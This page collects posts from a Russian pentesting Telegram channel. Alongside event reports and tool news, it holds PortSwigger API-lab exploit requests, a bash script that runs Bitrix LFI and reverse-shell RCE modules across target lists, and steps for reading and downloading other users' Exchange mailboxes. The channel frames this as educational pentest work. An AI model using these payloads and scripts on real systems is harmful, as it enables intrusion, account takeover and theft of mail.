Похек
17K subscribers
2.13K photos
111 videos
243 files
3.09K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
⬆️ Выступление ИБэшечка
#выступление

Выступил в Компьютерной Академии TOP. Ребята были очень классные, все покайфовали с доклада. Раздал комплекты стикеров, тем кто рассказал самый интересный варианта похека компании.

Отдельное спасибо администрации Академии, которая смогла оперативно согласовать данное мероприятие и выделить аудиторию.

Выступление получилось на целых 2,5 часа 😎

Вы хотите, чтобы я приехал и выступил у вас? Так ещё и можете это согласовать?! Тогда пишите мне, я всегда за, если у будет время!

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥30👍9🎉21
Forwarded from #Arm1tage
API Labs

На моей нелюбимой платформе SwiggerPort, не выкатили новые лабки по АПИ (я кстати не делал эти лабки, нет). А это значит, что не выходит и новый пост на не моём паблике (я кстати не админ этого паблика, нет).

Суть этого раздела дать тебе понять, что фаззить, сука, надо. И надо это делать красиво. А чтобы и ты мог делать это красиво, можешь использовать вот этот лист с параметрами для фаззинга.

🤨1. Exploiting an API endpoint using documentation
GET /api/
DELETE /api/user/carlos


🤨2. Exploiting server-side parameter pollution in a query string
Находим forgotPassword.js файл и выясняем, что есть параметр reset-token.

Теперь создаем POST /forgot-password запрос с %26 символом (означает, что он декодируется в & на серверной части) и фаззим (например через интрудер) параметр, там где $$:
csrf={ваш_csrf}&username=administrator%26$$


В итоге с помощью фаззинга находим параметр field. Вспоминаем, что мы нашли в жс коде ранее параметр ресет-токен и составляем финальный вид:
csrf={ваш_csrf}&username=administrator%26field=reset_token


Таким образом вы говорите серверу (из-за parameter pollution) выдать вам ресет токен пользователя администратор.

🤨3. Finding and exploiting an unused API endpoint
Меняем GET на PATCH:
PATCH /api/products/1/price

{
"price":0
}


🤨4. Exploiting a mass assignment vulnerability
Ищем параметры в ответе сервера:
GET /api/checkout

"chosen_discount":{"percentage":0}


Теперь создаем POST /api/checkout реквест с найденным ранее параметром. Изменяем значение percentage на 100 (типа 100% скидка понял да):

{"chosen_products":[{"product_id":"1","quantity":1}],
"chosen_discount":{"percentage":100}}



#portswigger #api
🔥14👍2
💻 Вышла Kali Linux 2023.4 с 15 новыми инструментами

Разработчики представили Kali Linux 2023.4, четвертую и последнюю версию дистрибутива в 2023 году. Новинка уже доступна для загрузки, содержит сразу 15 новых инструментов и GNOME 45.

Команда Offensive Security сообщает, что в финальном релизе этого года в ОС добавлено не так много новых функций, зато версия ядра обновлена до версии 6.3.7, а также появились сразу 15 новых инструментов:

cabby — имплементация клиента TAXII;
cti-taxii-client — библиотека клиента TAXII 2;
enum4linux-ng — следующее поколение enum4linux с дополнительными возможностями (инструмент энумерации Windows/Samba);
exiflooter — поиск геолокации по всем URL-адресам и каталогам изображений;
h8mail — email OSINT и инструмент для поиска утечек паролей;
Havoc — современная и гибкая система управления и контроля для пост-эксплуатации;
OpenTAXII — имплементация сервера TAXII;
PassDetective — сканирование истории shell-команд для обнаружения случайно записанных паролей, API-ключей и секретов;
Portspoof — все 65535 TCP портов всегда открыты и эмулируют сервисы;
Raven — легкий HTTP-сервис загрузки файлов;
ReconSpider — продвинутый фреймворк для OSINT;
rling — RLI Next Gen (Rling), более быстрая многопоточная и многофункциональная альтернатива rli;
Sigma-Cli — список и преобразование правил Sigma в языки запросов;
sn0int — полуавтоматический OSINT-фреймворк и менеджер пакетов;
SPIRE — набор API-интерфейсов SPIFFE Runtime Environment для установления доверия между программными системами.

📌 Я лично заинтересован в enum4linux-ng, h8mail, Havoc и Portspoof.

Если вы тоже не знаете, что такое TAXII, вы не одни такие :D.
TAXII – это протокол, определяющий способы обмена информацией о киберугрозах через службы и средства обмена сообщениями (RESTful API), и набор требований для клиента и сервера. В TAXII поддерживаются две основные модели обмена информации об угрозах – Collection и Channel.
😉

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19❤‍🔥4🔥21
🚪 Куда же меня занесло этим морозным утром?
#codeib

Код ИБ. Итоги 2023. Москва

📡 Конференция создана с целью, собрать лидеров рынка в одном месте и обсудить все произошедшее за год, а также наметить новые этапы сотрудничества в будущем году.

☑️ Код ИБ пригласили меня, как СМИ. Я считаю это высокий уровень. Благодарен им за это. Надеюсь на дальнейшее сотрудничество!

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15👍52👎1
Forwarded from 🕷 BugBountyRu
Сергей, овнер канала @poxek
🔥177🌚6🤣4👍3❤‍🔥22👎1😁1
Выиграл в номинации «Все великое начинается с малого». Очень рад, что жюри выбрали меня и мой канал победителем в этой номинации!
25🔥13👍53❤‍🔥1🥰1
Похек
🚪 Куда же меня занесло этим морозным утром? #codeib Код ИБ. Итоги 2023. Москва 📡 Конференция создана с целью, собрать лидеров рынка в одном месте и обсудить все произошедшее за год, а также наметить новые этапы сотрудничества в будущем году. ☑️ Код ИБ…
📣 Что я могу сказать про КОД ИБ. Итоги 2023?

Это было замечательно.
Не смотря на мелкие косяки, которые есть всегда, нетворкинг и организация был на высочайшем уровне, за что отдельная благодарность Ольге Поздняк и всей её команде, включая волонтёров, которые приложили максимум усилий к организации этой конференции.

🔊 Я давно не видел столько коллег в одном месте, а также завел другие знакомства и надеюсь в будущем партнёрства!

❤️ Выиграл подарок Тетрис, как в детстве!

📌 Т.к. я был оффлайн первый раз, то поспрашивал у знакомых, спикеров, что они думают про конференцию, её развитие и организацию в этом году. Они ответили, что за последние несколько лет, Код ИБ развивается, исправляет прошлые недостатки и привносит каждый год что-то новое. Я был с ними абсолютно согласен.

🟢 Фото и видео будут в комментариях

❗️ Также сфотографировался с Лукой и КиберДедом)

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍85🔥2🤣1
Forwarded from вольтаж
Пока каналы переполнены советами, крутыми тулзами и историями успеха, поделюсь рефлексией на прошедший Standoff Hacks, включая все свои #fail'ы, что из них вынес и почему интерес к ИБ разгорелся ещё сильнее.

https://teletype.in/@hackthishit/hacks-reflection
👍136
Похек
Quick-tricks Сканер уязвимостей Bitrix на основе руководства Атаки на Bitrix Установка: go install github.com/indigo-sadland/quick-tricks@latest Функционал: quick-tricks [command] help Справка о любой команде quick Запуск всех быстрых модулей ('recon'…
quick-tricks
9 MB
🔥 quick-trics_auto.sh

Когда-то я выкладывал пост про интересную тулзу для быстрой проверки Bitrix на наличие простых уязвимостей. И я писал, что мол написал скрипт, но с вами им не поделился 🌚
Исправляюсь! Переписал скрипт, теперь он будет бегать по всем урлам построчно и проверять на всё что только можно из этого инструмента, кроме XSS, т.к. модуль фолзит, из-за того, что нагрузка тупо вставляется и если 200, то он пишет что якобы XSS нашёл, но в 99,999% случаев, сайт просто проглотит нагрузку и ничего не случиться.

#!/bin/bash
echo "Lauch netcat for revshells"
printf "Enter IP ($(curl -s 2ip.ru)): "
read $IP
printf "Enter Port: "
read $PORT

for ((i=1; i <= $(wc -l scope.txt | awk '{print $1;}'); i++))
do
quick-tricks spoofing -u $(sed -n "$i p" scope.txt)
quick-tricks redirect -u $(sed -n "$i p" scope.txt)
quick-tricks lfi -u $(sed -n "$i p" scope.txt)
quick-tricks recon -a -u $(sed -n "$i p" scope.txt)
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 2
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 4
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 7
quick-tricks rce html-editor -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT
done


🍷 Написал скрипт так, чтобы вы его просто запустили, а дальше ушли пить чай.

Но скорее всего у вас вообще не окажется quick-tricks, т.к. автор зачем-то удалил/скрыл репозиторий. Поэтому к этому посту я прикреплю бинарь этого инструмента под Linux.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍132❤‍🔥2
Митап BI.ZONE x Mephi CTF
#митап #bizone

🕐🕑🕒 🪲
Please open Telegram to view this post
VIEW IN TELEGRAM
14🔥52
This media is not supported in your browser
VIEW IN TELEGRAM
Одним из трендов этого года был DevSecOps 💻, а также чем заменить ушедших вендоров.
Нашёл хорошую статью на эту тему 🤔

Как мы в РСХБ построили ИБ-платформу с использованием OpenSource-инструментов

В рамках материала автор рассмотрел следующие вопросы:

➡️ Можно ли платформу ИБ построить бесплатно и в кратчайшие сроки?

➡️ Можно ли ASOC сделать понятным для бизнеса? Бизнес — наш основной заказчик. Понятно, что все процессы и все что мы делаем не для себя, дома ASOC нам не нужен. ИБ‑специалистам это тоже не нужно, все это нужно бизнес‑заказчику. Поэтому нужно сделать платформу, которая будет понятна всем.

➡️ Как оптимизировать процессы ИБ, сократив Time‑to‑Market до минимума? Меня сразу поставили в определенные рамки: проверки практик DevSecOps в CI/CD не должны занимать больше 10–15 минут. Нужно как‑то вписаться в них.

➡️ Как оценить жизненный цикл уязвимости и эффективность работы специалистов ИБ?

➡️ Как подготовиться к включению QG так, чтобы ни один из разработчиков не пострадал?

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
5👍3❤‍🔥1👾1
NTLM to password
#windows

https://ntlm.pw/

thx snovvcrash


🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13👍5😈2🎉1👨‍💻11
Похек
Одним из трендов этого года был DevSecOps 💻, а также чем заменить ушедших вендоров. Нашёл хорошую статью на эту тему 🤔 Как мы в РСХБ построили ИБ-платформу с использованием OpenSource-инструментов В рамках материала автор рассмотрел следующие вопросы: ➡️
This media is not supported in your browser
VIEW IN TELEGRAM
🐧 Как в OWASP ZAP создать авторизационный контекст и задействовать его в автоматизации

С вами инженерный отдел по динамическому анализу Swordfish Security. Продолжаем разбирать полезные кейсы, и сегодня мы рассмотрим, как в DAST-сканере OWASP ZAP настроить автоматическую авторизацию в приложении и переиспользовать ее в дальнейших сканированиях.
OWASP ZAP (Zed Attack Proxy) — один из самых популярных инструментов для проверки безопасности веб-приложений. У него широкий диапазон возможностей для обнаружения уязвимостей. Однако, прежде чем начать сканирование, необходимо правильно настроить инструмент, в том числе и авторизацию, чтобы тестировать приложение с одной или нескольких учетных записей.

В комментариях к предыдущем посту про DevSecOps подметили, что в статье ничего не говорилось про DAST. А зря 😈. Поэтому решил дополнить тему статьей про DAST с помощью OWASP ZAP 😁

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥43🫡11
🏠 Митап ][akep
#митап #xakep

Спасибо Дмитрию, его команде и КиберДому за прекрасную организацию митапа, за очень вкусную еду.

❗️ Также были интересные докладчики и самое главное интересное, полезное живое общение с коллегами.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥132
This media is not supported in your browser
VIEW IN TELEGRAM
🧲 LAN-party для пентестеров: прорываемся к домен контроллеру через розетку

Сегодня расскажу про внутренний пентест, в ходе которого мы без учетной записи добрались до администратора домена.

В этом проекте использовались много разнообразных техник: от декомпиляции приложения и расшифровки извлеченных учетных данных, до повышения привилегий через базу данных на сервере и сбора информации от имени учетной записи компьютера. Под катом подробно разобрано, как они сложились в успешный вектор атаки.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8👍5
Forwarded from true_security
list.png
45.3 KB
Первой публикацией я хотел бы поделиться интересной историей про ms exchange.
Пользователи могут управлять разрешениями на доступ к каталогам своей электронной почты.
Это может делать и почтовый администратор.
При получении доступа к одной эл.почте мы можем проверить права доступа к чужим эл.ящикам:
!!!Важно, ваша учетная запись должна иметь доступ по протоколу ews!!!

1) выгрузить список всех адресов из глобальной адресной книги:
например, через MailSniper.ps1 (https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1)
Get-GlobalAddressList -ExchHostname owa.server.com -UserName domain\user -Password password123 -OutFile gal.txt

2) запустить проверку прав доступа через мой скрипт:
https://github.com/feedb/ebussing/blob/main/ge.py
в файлу gal.txt у вас должна находиться адреса эл.почты
python3 ge.py

Будут выводиться записи root, где то будет отображаться дерево как на скриншоте.
Наличие дерева подразумевает доступ вашей учетной записи к каталогам и их содержимому эл.ящика (см.скриншот)
3) находим почты с разрешенным доступом и выгружаем содержимое каталога входящих писем скриптом:
https://github.com/feedb/ebussing/blob/main/download.py
в emails.txt складываем почты в которых есть доступ к inbox/входящие, создаем каталог out
и запускаем
python3 get.py


В каталоге out будут сохраняться eml чужих сообщений
P.s. скрипты написаны на коленке, в новой версии будут параметры и т.д.
🔥8😈1